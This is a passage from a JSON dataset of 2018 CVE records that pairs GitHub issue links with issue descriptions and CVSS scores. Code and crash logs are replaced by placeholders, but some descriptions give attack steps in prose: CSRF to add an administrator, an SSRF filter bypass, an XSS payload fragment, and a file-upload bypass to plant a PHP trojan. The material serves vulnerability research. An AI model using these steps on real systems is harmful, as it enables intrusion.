APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG b1e in APITAG APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , unsigned int) PATHTAG NUMBERTAG b1e in main PATHTAG NUMBERTAG f3ffb NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG f8 in _start ( PATHTAG )",
  22915. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22916. "severity": "MEDIUM",
  22917. "baseScore": 5.5,
  22918. "impactScore": 3.6,
  22919. "exploitabilityScore": 1.8
  22920. },
  22921. {
  22922. "CVE_ID": "CVE-2018-14549",
  22923. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/23",
  22924. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/23",
  22925. "Repo_new": "marc-q/libwav",
  22926. "Issue_Created_At": "2018-07-21T04:54:03Z",
  22927. "description": "SEGV in function wav_write in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG in APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22928. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22929. "severity": "MEDIUM",
  22930. "baseScore": 6.5,
  22931. "impactScore": 3.6,
  22932. "exploitabilityScore": 2.8
  22933. },
  22934. {
  22935. "CVE_ID": "CVE-2018-14550",
  22936. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/246",
  22937. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/246",
  22938. "Repo_new": "glennrp/libpng",
  22939. "Issue_Created_At": "2018-07-21T07:08:11Z",
  22940. "description": "stack buffer overflow in png2pnm in function get_token. There is an issue in png2pnm in libpng NUMBERTAG It's a stack buffer overflow in png2pnm in function get_token. To compile png2pnm,those command can be used with Clang NUMBERTAG CODETAG The APITAG in folder APITAG should also be modified before the command APITAG as mention in this comment URLTAG : CODETAG This file URLTAG can cause stack buffer overflow when using this command: APITAG This is the ASAN information: ERRORTAG",
  22941. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22942. "severity": "HIGH",
  22943. "baseScore": 8.8,
  22944. "impactScore": 5.9,
  22945. "exploitabilityScore": 2.8
  22946. },
  22947. {
  22948. "CVE_ID": "CVE-2018-14551",
  22949. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1221",
  22950. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1221",
  22951. "Repo_new": "imagemagick/imagemagick",
  22952. "Issue_Created_At": "2018-07-20T09:26:25Z",
  22953. "description": "Using uninitialized variable in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description The code in PATHTAG use uninitialized variable. line NUMBERTAG APITAG line NUMBERTAG run into APITAG there have some break condition in the loop. APITAG APITAG line NUMBERTAG APITAG The code use uninitialized variable if break from loop.",
  22954. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22955. "severity": "CRITICAL",
  22956. "baseScore": 9.8,
  22957. "impactScore": 5.9,
  22958. "exploitabilityScore": 3.9
  22959. },
  22960. {
  22961. "CVE_ID": "CVE-2018-14562",
  22962. "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/35",
  22963. "Issue_Url_new": "https://github.com/thunlp/thulac/issues/35",
  22964. "Repo_new": "thunlp/thulac",
  22965. "Issue_Created_At": "2018-07-18T02:02:47Z",
  22966. "description": "SEGV signal occurred when running program thulac. When I tried to run the thulac and thulac_test programs, I found this: ERRORTAG",
  22967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22968. "severity": "CRITICAL",
  22969. "baseScore": 9.8,
  22970. "impactScore": 5.9,
  22971. "exploitabilityScore": 3.9
  22972. },
  22973. {
  22974. "CVE_ID": "CVE-2018-14563",
  22975. "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/37",
  22976. "Issue_Url_new": "https://github.com/thunlp/thulac/issues/37",
  22977. "Repo_new": "thunlp/thulac",
  22978. "Issue_Created_At": "2018-07-18T02:34:19Z",
  22979. "description": "Alloc dealloc mismatch . When I give an empty file to the program train_c, I found this issue: ERRORTAG",
  22980. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22981. "severity": "CRITICAL",
  22982. "baseScore": 9.8,
  22983. "impactScore": 5.9,
  22984. "exploitabilityScore": 3.9
  22985. },
  22986. {
  22987. "CVE_ID": "CVE-2018-14565",
  22988. "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/36",
  22989. "Issue_Url_new": "https://github.com/thunlp/thulac/issues/36",
  22990. "Repo_new": "thunlp/thulac",
  22991. "Issue_Created_At": "2018-07-18T02:06:29Z",
  22992. "description": "Buffer overflow occurred during training process. When I try to run program train_c with the command line : APITAG The address sanitizer found a heap buffer overflow issue: ERRORTAG The input file I tried to give to the program train_c contains only APITAG as you suggested in your document.",
  22993. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22994. "severity": "CRITICAL",
  22995. "baseScore": 9.8,
  22996. "impactScore": 5.9,
  22997. "exploitabilityScore": 3.9
  22998. },
  22999. {
  23000. "CVE_ID": "CVE-2018-14572",
  23001. "Issue_Url_old": "https://github.com/PyconUK/ConferenceScheduler-cli/issues/19",
  23002. "Issue_Url_new": "https://github.com/pyconuk/conferencescheduler-cli/issues/19",
  23003. "Repo_new": "pyconuk/conferencescheduler-cli",
  23004. "Issue_Created_At": "2018-07-24T00:52:43Z",
  23005. "description": "import_schedule_definition is vulnerable. CODETAG Hi, there is a vulnerability in import_schedule_definition method in io.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  23006. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23007. "severity": "HIGH",
  23008. "baseScore": 7.8,
  23009. "impactScore": 5.9,
  23010. "exploitabilityScore": 1.8
  23011. },
  23012. {
  23013. "CVE_ID": "CVE-2018-14576",
  23014. "Issue_Url_old": "https://github.com/SunContract/SmartContracts/issues/1",
  23015. "Issue_Url_new": "https://github.com/suncontract/smartcontracts/issues/1",
  23016. "Repo_new": "suncontract/smartcontracts",
  23017. "Issue_Created_At": "2018-07-17T13:43:54Z",
  23018. "description": "Integer overflow in APITAG Hello, I have found an integer overflow in APITAG The supply variable could overflow, because the _amount variable is controlled by the caller and can eventually cause supply to overflow to zero. ERRORTAG",
  23019. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  23020. "severity": "HIGH",
  23021. "baseScore": 7.5,
  23022. "impactScore": 3.6,
  23023. "exploitabilityScore": 3.9
  23024. },
  23025. {
  23026. "CVE_ID": "CVE-2018-14582",
  23027. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/2",
  23028. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/2",
  23029. "Repo_new": "bagesoft/bagecms",
  23030. "Issue_Created_At": "2018-07-23T02:17:32Z",
  23031. "description": "There is a CSRF vulnerability that can be used to add a background administrator.. While the administrator is logged in, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  23032. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23033. "severity": "HIGH",
  23034. "baseScore": 8.8,
  23035. "impactScore": 5.9,
  23036. "exploitabilityScore": 2.8
  23037. },
  23038. {
  23039. "CVE_ID": "CVE-2018-14583",
  23040. "Issue_Url_old": "https://github.com/maoGod/xyhcms/issues/1",
  23041. "Issue_Url_new": "https://github.com/maogod/xyhcms/issues/1",
  23042. "Repo_new": "maoGod/xyhcms",
  23043. "Issue_Created_At": "2018-07-23T03:33:24Z",
  23044. "description": "Xyhcms NUMBERTAG There is a CSRF vulnerability to add a background administrator. While the administrator is logged in, open it. APITAG CODETAG",
  23045. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23046. "severity": "HIGH",
  23047. "baseScore": 8.8,
  23048. "impactScore": 5.9,
  23049. "exploitabilityScore": 2.8
  23050. },
  23051. {
  23052. "CVE_ID": "CVE-2018-14584",
  23053. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/304",
  23054. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/304",
  23055. "Repo_new": "axiomatic-systems/bento4",
  23056. "Issue_Created_At": "2018-07-23T07:32:04Z",
  23057. "description": "A heap buffer overflow has occurred when running program mp4info.. A heap buffer overflow has occurred when running program mp4info. ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
  23058. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23059. "severity": "HIGH",
  23060. "baseScore": 8.8,
  23061. "impactScore": 5.9,
  23062. "exploitabilityScore": 2.8
  23063. },
  23064. {
  23065. "CVE_ID": "CVE-2018-14587",
  23066. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/301",
  23067. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/301",
  23068. "Repo_new": "axiomatic-systems/bento4",
  23069. "Issue_Created_At": "2018-07-23T06:39:42Z",
  23070. "description": "A global buffer overflow has occurred when running mp4info. A global buffer overflow has occurred when running ./mp4info ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
  23071. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23072. "severity": "HIGH",
  23073. "baseScore": 8.8,
  23074. "impactScore": 5.9,
  23075. "exploitabilityScore": 2.8
  23076. },
  23077. {
  23078. "CVE_ID": "CVE-2018-14588",
  23079. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/302",
  23080. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/302",
  23081. "Repo_new": "axiomatic-systems/bento4",
  23082. "Issue_Created_At": "2018-07-23T06:45:02Z",
  23083. "description": "A SEGV signal occurred when running mp4info. A SEGV signal occurred when running mp4info. ERRORTAG The testing program is mp4info And the input file has been put at: URLTAG",
  23084. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23085. "severity": "HIGH",
  23086. "baseScore": 7.5,
  23087. "impactScore": 3.6,
  23088. "exploitabilityScore": 3.9
  23089. },
  23090. {
  23091. "CVE_ID": "CVE-2018-14589",
  23092. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/303",
  23093. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/303",
  23094. "Repo_new": "axiomatic-systems/bento4",
  23095. "Issue_Created_At": "2018-07-23T07:02:34Z",
  23096. "description": "A heap buffer overflow has occurred when running program mp4info. . A heap buffer overflow has occurred when running program mp4info. ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
  23097. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23098. "severity": "HIGH",
  23099. "baseScore": 8.8,
  23100. "impactScore": 5.9,
  23101. "exploitabilityScore": 2.8
  23102. },
  23103. {
  23104. "CVE_ID": "CVE-2018-14590",
  23105. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/305",
  23106. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/305",
  23107. "Repo_new": "axiomatic-systems/bento4",
  23108. "Issue_Created_At": "2018-07-23T07:35:12Z",
  23109. "description": "A SEGV signal occurred when running mp4compact.. A SEGV signal occurred when running mp4compact. ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
  23110. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23111. "severity": "HIGH",
  23112. "baseScore": 7.5,
  23113. "impactScore": 3.6,
  23114. "exploitabilityScore": 3.9
  23115. },
  23116. {
  23117. "CVE_ID": "CVE-2018-14649",
  23118. "Issue_Url_old": "https://github.com/ceph/ceph-iscsi-cli/issues/120",
  23119. "Issue_Url_new": "https://github.com/ceph/ceph-iscsi-cli/issues/120",
  23120. "Repo_new": "ceph/ceph-iscsi-cli",
  23121. "Issue_Created_At": "2018-09-23T15:19:00Z",
  23122. "description": "rbd target api.py exploited.. Hello, I've found that the python code was used to compromise our host remotely (in our case it was running as root so the attacker gained root privileges), the logs contains: CODETAG Hope this helps.",
  23123. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23124. "severity": "CRITICAL",
  23125. "baseScore": 9.8,
  23126. "impactScore": 5.9,
  23127. "exploitabilityScore": 3.9
  23128. },
  23129. {
  23130. "CVE_ID": "CVE-2018-14718",
  23131. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2097",
  23132. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2097",
  23133. "Repo_new": "fasterxml/jackson-databind",
  23134. "Issue_Created_At": "2018-07-27T05:58:22Z",
  23135. "description": "CVE xxxx xxx: block another type from polymorphic deserialization. (note: placeholder for a CVE)",
  23136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23137. "severity": "CRITICAL",
  23138. "baseScore": 9.8,
  23139. "impactScore": 5.9,
  23140. "exploitabilityScore": 3.9
  23141. },
  23142. {
  23143. "CVE_ID": "CVE-2018-14730",
  23144. "Issue_Url_old": "https://github.com/AgentME/browserify-hmr/issues/41",
  23145. "Issue_Url_new": "https://github.com/macil/browserify-hmr/issues/41",
  23146. "Repo_new": "macil/browserify-hmr",
  23147. "Issue_Created_At": "2018-07-24T08:12:44Z",
  23148. "description": "A vulnerability found in browserify hmr. Hi, I found a vulnerability in browserify hmr, how do I report it to you?",
  23149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23150. "severity": "HIGH",
  23151. "baseScore": 7.5,
  23152. "impactScore": 3.6,
  23153. "exploitabilityScore": 3.9
  23154. },
  23155. {
  23156. "CVE_ID": "CVE-2018-14731",
  23157. "Issue_Url_old": "https://github.com/parcel-bundler/parcel/issues/1783",
  23158. "Issue_Url_new": "https://github.com/parcel-bundler/parcel/issues/1783",
  23159. "Repo_new": "parcel-bundler/parcel",
  23160. "Issue_Created_At": "2018-07-24T08:11:12Z",
  23161. "description": "A vulnerability found in parcel bundler. Hi, I found a vulnerability in parcel bundler, how do I report it to you?",
  23162. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23163. "severity": "HIGH",
  23164. "baseScore": 7.5,
  23165. "impactScore": 3.6,
  23166. "exploitabilityScore": 3.9
  23167. },
  23168. {
  23169. "CVE_ID": "CVE-2018-14732",
  23170. "Issue_Url_old": "https://github.com/webpack/webpack-dev-server/issues/1445",
  23171. "Issue_Url_new": "https://github.com/webpack/webpack-dev-server/issues/1445",
  23172. "Repo_new": "webpack/webpack-dev-server",
  23173. "Issue_Created_At": "2018-07-24T08:09:59Z",
  23174. "description": "A vulnerability found in webpack dev server. Hi, I found a vulnerability in webpack dev server, how do I report it to you?",
  23175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23176. "severity": "HIGH",
  23177. "baseScore": 7.5,
  23178. "impactScore": 3.6,
  23179. "exploitabilityScore": 3.9
  23180. },
  23181. {
  23182. "CVE_ID": "CVE-2018-14732",
  23183. "Issue_Url_old": "https://github.com/webpack/webpack-dev-server/issues/1620",
  23184. "Issue_Url_new": "https://github.com/webpack/webpack-dev-server/issues/1620",
  23185. "Repo_new": "webpack/webpack-dev-server",
  23186. "Issue_Created_At": "2019-01-07T17:51:38Z",
  23187. "description": "Please backport CVETAG security fix to NUMBERTAG Operating System: n/a Node Version: n/a NPM Version: n/a webpack Version NUMBERTAG webpack dev server Version NUMBERTAG This is a bug [x] This is a modification request [ CVETAG ] describes a vulnerability in webpack dev APITAG by which attackers are able to steal developers\u2019 code. The vulnerability is classified as \u201cHIGH severity\u201d under the CVSS NUMBERTAG score. [A patch has been released][patch] and included in version NUMBERTAG However, version NUMBERTAG of the package requires APITAG , which entails significant breaking changes from Webpack NUMBERTAG and prior versions, as well as major version bumps to transitive peer dependencies, including APITAG . It is not trivial for users of the NUMBERTAG series to upgrade to a patched version of webpack dev server. As such, please backport the fix to version NUMBERTAG and release a new version, to protect the security of users who are unable to upgrade. Thank you for the hard work that you put into developing and maintaining this library. We appreciate it. [ CVETAG ]: URLTAG [patch]: URLTAG [comment]: URLTAG",
  23188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23189. "severity": "HIGH",
  23190. "baseScore": 7.5,
  23191. "impactScore": 3.6,
  23192. "exploitabilityScore": 3.9
  23193. },
  23194. {
  23195. "CVE_ID": "CVE-2018-14733",
  23196. "Issue_Url_old": "https://github.com/OCA/server-tools/issues/1335",
  23197. "Issue_Url_new": "https://github.com/oca/server-tools/issues/1335",
  23198. "Repo_new": "oca/server-tools",
  23199. "Issue_Created_At": "2018-08-08T07:56:44Z",
  23200. "description": "SEC] OCA NUMBERTAG Denial of Service via APITAG . Security Advisory (OCA NUMBERTAG Denial of Service via APITAG Affects: Odoo NUMBERTAG servers: having APITAG module available in the addons path being directly accessible OR missing the expected configuration at the reverse proxy level (nginx) Credits : Nils Hamerlinck APITAG CVE ID : [ CVETAG CVETAG I. Background APITAG URLTAG module from OCA's APITAG repository URLTAG allows to take into account a specific HTTP header in the request ( APITAG or APITAG , depending on the version) to define the FILETAG applying to the instance. This is useful when you have one instance with multiple databases whose names don't match with the target domain names. II. Problem Description In a normal use case this HTTP header is set by the system administrator at the reverse proxy level (nginx); module is added to the APITAG config parameter and installed. But the module contains a APITAG directory, which had the unexpected effect URLTAG of trigerring its inconditional loading, even when not intended to be used: not added to the APITAG nor installed. III. Impact Attack Vector : Network exploitable Authentication : Not Required CVSS3 Score : High NUMBERTAG PATHTAG URLTAG So by just having it available in its addons path, the instance would load APITAG . An attacker could define a APITAG / APITAG header that would be evaluated as the db_filter regular expression URLTAG . By crafting a voluntarily inefficient regular expression, he could lead Odoo to APITAG (aka APITAG in threaded mode, with one request; in multi workers mode, with one request per worker (that would process until APITAG ). IV. Workaround If your Odoo server is accessible directly without any reverse proxy, there is no workaround. Note that using a reverse proxy is FILETAG for security but also performances reasons. If your Odoo server is running behind a reverse proxy, configure it at least to set the APITAG header to APITAG (or any relevant stricter regex for the concerned host): nginx: APITAG others: see here URLTAG V. Solution Update APITAG source code. If you intend to use this module in a deployment, make sure that: proxy mode is enabled in Odoo's configuration file: APITAG a APITAG header is properly defined at reverse proxy level module is added to APITAG VI. Correction details The following list contains the revisions after which the vulnerability is corrected NUMBERTAG URLTAG NUMBERTAG fa NUMBERTAG URLTAG NUMBERTAG e9bf URLTAG NUMBERTAG f5 URLTAG",
  23201. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23202. "severity": "HIGH",
  23203. "baseScore": 7.5,
  23204. "impactScore": 3.6,
  23205. "exploitabilityScore": 3.9
  23206. },
  23207. {
  23208. "CVE_ID": "CVE-2018-14736",
  23209. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/123",
  23210. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/123",
  23211. "Repo_new": "cloudwu/pbc",
  23212. "Issue_Created_At": "2018-07-24T06:48:42Z",
  23213. "description": "A global buffer overflow issue has been detected. When I ran the program addressbook. ASAN found a global buffer overflow: ERRORTAG",
  23214. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23215. "severity": "HIGH",
  23216. "baseScore": 7.5,
  23217. "impactScore": 3.6,
  23218. "exploitabilityScore": 3.9
  23219. },
  23220. {
  23221. "CVE_ID": "CVE-2018-14737",
  23222. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/122",
  23223. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/122",
  23224. "Repo_new": "cloudwu/pbc",
  23225. "Issue_Created_At": "2018-07-24T06:42:29Z",
  23226. "description": "SEGV signal found when running program pbc. A SEGV signal occurred when running program pbc: ERRORTAG",
  23227. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23228. "severity": "HIGH",
  23229. "baseScore": 7.5,
  23230. "impactScore": 3.6,
  23231. "exploitabilityScore": 3.9
  23232. },
  23233. {
  23234. "CVE_ID": "CVE-2018-14744",
  23235. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/125",
  23236. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/125",
  23237. "Repo_new": "cloudwu/pbc",
  23238. "Issue_Created_At": "2018-07-24T10:39:34Z",
  23239. "description": "Heap use after free detected. When I ran the program pattern. A issue occurred, it's a heap use after free issue. Details: ERRORTAG The command line I used is just: ./pattern testcase. The testcase of this issue has been put at: URLTAG",
  23240. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23241. "severity": "CRITICAL",
  23242. "baseScore": 9.8,
  23243. "impactScore": 5.9,
  23244. "exploitabilityScore": 3.9
  23245. },
  23246. {
  23247. "CVE_ID": "CVE-2018-14835",
  23248. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/760",
  23249. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/760",
  23250. "Repo_new": "intelliants/subrion",
  23251. "Issue_Created_At": "2018-07-14T04:40:46Z",
  23252. "description": "Stored self XSS in APITAG member field tooltip\". There exists no escape when printing out tooltip under APITAG member\" ( URLTAG Steps to reproduce Navigate to Member field URLTAG Add a new field group or edit an existing one. Add the tooltip value as our XSS payload ERRORTAG Now navigate to URLTAG XSS payload would be trigerred. APITAG APITAG",
  23253. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23254. "severity": "MEDIUM",
  23255. "baseScore": 5.4,
  23256. "impactScore": 2.7,
  23257. "exploitabilityScore": 2.3
  23258. },
  23259. {
  23260. "CVE_ID": "CVE-2018-14836",
  23261. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/762",
  23262. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/762",
  23263. "Repo_new": "intelliants/subrion",
  23264. "Issue_Created_At": "2018-07-14T18:10:11Z",
  23265. "description": "Broken Authentication APITAG partial access to admin panel) . In the application, the administrator can create user groups & also apply security policies (permission) to it, application to all member of its group. One of the policies being user group permission to the \"admin panel\". Unfortunately, this doesn't work as expected. A normal user belonging to the Registered group ( No access to admin panel ), can still get inside the admin panel (but cant perform any action). Steps to reproduce NUMBERTAG Navigate to admin panel & enter credentials (registered user), user would be logged in NUMBERTAG Once he clicks on any links, would be quickly logged out of the application & would not be able to log in again. In order to reproduce again, log in from a valid user credential, having access to the admin panel & then logout. Now repeat NUMBERTAG",
  23266. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  23267. "severity": "MEDIUM",
  23268. "baseScore": 6.5,
  23269. "impactScore": 3.6,
  23270. "exploitabilityScore": 2.8
  23271. },
  23272. {
  23273. "CVE_ID": "CVE-2018-14840",
  23274. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/773",
  23275. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/773",
  23276. "Repo_new": "intelliants/subrion",
  23277. "Issue_Created_At": "2018-08-01T07:56:36Z",
  23278. "description": "Deny access for .html files in uploads folder.",
  23279. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23280. "severity": "MEDIUM",
  23281. "baseScore": 6.1,
  23282. "impactScore": 2.7,
  23283. "exploitabilityScore": 2.8
  23284. },
  23285. {
  23286. "CVE_ID": "CVE-2018-14858",
  23287. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/33",
  23288. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/33",
  23289. "Repo_new": "idreamsoft/iCMS",
  23290. "Issue_Created_At": "2018-08-02T04:33:24Z",
  23291. "description": "iCMS NUMBERTAG SSRF vulnerability. >A SSRF vulnerability was discovered in iCMS NUMBERTAG here is a SSRF vulnerability that allows attackers to remotely construct malicious data to read server sensitive information. via the APITAG Notice This vulnerability is used in the right way APITAG of loophole repair is bypassed, or the flaw caused by imperfect repair. cause of loopholes The vulnerability is repaired by the URL protocol judgment before each HTTP request. Only HTTP, the URL of the HTTPS protocol is successfully requested, but the IP format URL is not limited, so the URLTAG or the IP decimal format of URL URLTAG NUMBERTAG can be used to obtain the service. Information of Intranet resources APITAG POC APITAG APITAG",
  23292. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23293. "severity": "HIGH",
  23294. "baseScore": 7.5,
  23295. "impactScore": 3.6,
  23296. "exploitabilityScore": 3.9
  23297. },
  23298. {
  23299. "CVE_ID": "CVE-2018-14876",
  23300. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/520",
  23301. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/520",
  23302. "Repo_new": "flif-hub/flif",
  23303. "Issue_Created_At": "2018-07-25T07:00:06Z",
  23304. "description": "FLIF aborted caused by longjmp causes uninitialized stack frame. Hello,guys,I use my company fuzzing tools .I found FLIF aborted.I think it caused by longjmp causes uninitialized stack frame.I search some information abort it. In google,the curl meet same situation.So I think it is a BUG. So,I want to show you more information about it.",
  23305. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23306. "severity": "MEDIUM",
  23307. "baseScore": 5.5,
  23308. "impactScore": 3.6,
  23309. "exploitabilityScore": 1.8
  23310. },
  23311. {
  23312. "CVE_ID": "CVE-2018-14877",
  23313. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/5",
  23314. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/5",
  23315. "Repo_new": "alterebro/weaselcms",
  23316. "Issue_Created_At": "2018-07-31T02:13:05Z",
  23317. "description": "There have XSS vulnerability that can excute javascript . There are NUMBERTAG SS vulnerabilities loading FILETAG log in and select \"SETTINGS\", Insert the payload APITAG APITAG >alert NUMBERTAG APITAG //\" in the Site APITAG APITAG APITAG Keywords and submit. open FILETAG line NUMBERTAG CODETAG",
  23318. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23319. "severity": "MEDIUM",
  23320. "baseScore": 5.4,
  23321. "impactScore": 2.7,
  23322. "exploitabilityScore": 2.3
  23323. },
  23324. {
  23325. "CVE_ID": "CVE-2018-14911",
  23326. "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/1",
  23327. "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/1",
  23328. "Repo_new": "yxcmf/ukcms",
  23329. "Issue_Created_At": "2018-08-01T01:39:58Z",
  23330. "description": "ukcms NUMBERTAG and other Lower version ) has a APITAG vulnerability. Vulnerability description The CMS background content management editor has a file uploading vulnerability. By modifying the background file upload parameter: the APITAG upload file suffix\" section, you can bypass the restrictions on php file upload by cms, and then pass the Trojan horse and the getshell poc APITAG to the backstage as the admin NUMBERTAG add the value 'php' into 'upload_file_ext' which is a cms parameter use to limit upload APITAG use two 'php' to bypass limit eg: php,php) url: PATHTAG FILETAG FILETAG NUMBERTAG Go to any page editing section,choose the upload function. APITAG the suffix of a PHP Trojan to APITAG For pass the limit) Second,click the button to save the upload file APITAG BURPSUITE for packet capture and modification,modify the suffix to .php,add some arbitrarily string before the file APITAG pass the file head check),and then upload it! FILETAG FILETAG FILETAG FILETAG APITAG last step,connection the trojan FILETAG FILETAG Success!",
  23331. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  23332. "severity": "HIGH",
  23333. "baseScore": 7.2,
  23334. "impactScore": 5.9,
  23335. "exploitabilityScore": 1.2
  23336. },
  23337. {
  23338. "CVE_ID": "CVE-2018-14938",
  23339. "Issue_Url_old": "https://github.com/simsong/tcpflow/issues/182",
  23340. "Issue_Url_new": "https://github.com/simsong/tcpflow/issues/182",
  23341. "Repo_new": "simsong/tcpflow",
  23342. "Issue_Created_At": "2018-08-02T15:47:43Z",
  23343. "description": "A integer overflow vulnerability in APITAG There is a overflow vulnerability in function APITAG while handle wifipacp's caplen. APITAG if the caplen NUMBERTAG we can cause a integer overflow vulnerability in function APITAG , which will result in a out of bounds read and may allow access to sensitive memory(or just a ddos). ERRORTAG",
  23344. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  23345. "severity": "CRITICAL",
  23346. "baseScore": 9.1,
  23347. "impactScore": 5.2,
  23348. "exploitabilityScore": 3.9
  23349. },
  23350. {
  23351. "CVE_ID": "CVE-2018-14940",
  23352. "Issue_Url_old": "https://github.com/m0us3Sun/PHPCMS-v9/issues/1",
  23353. "Issue_Url_new": "https://github.com/m0us3sun/phpcms-v9/issues/1",
  23354. "Repo_new": "m0us3sun/phpcms-v9",
  23355. "Issue_Created_At": "2018-07-23T04:07:15Z",
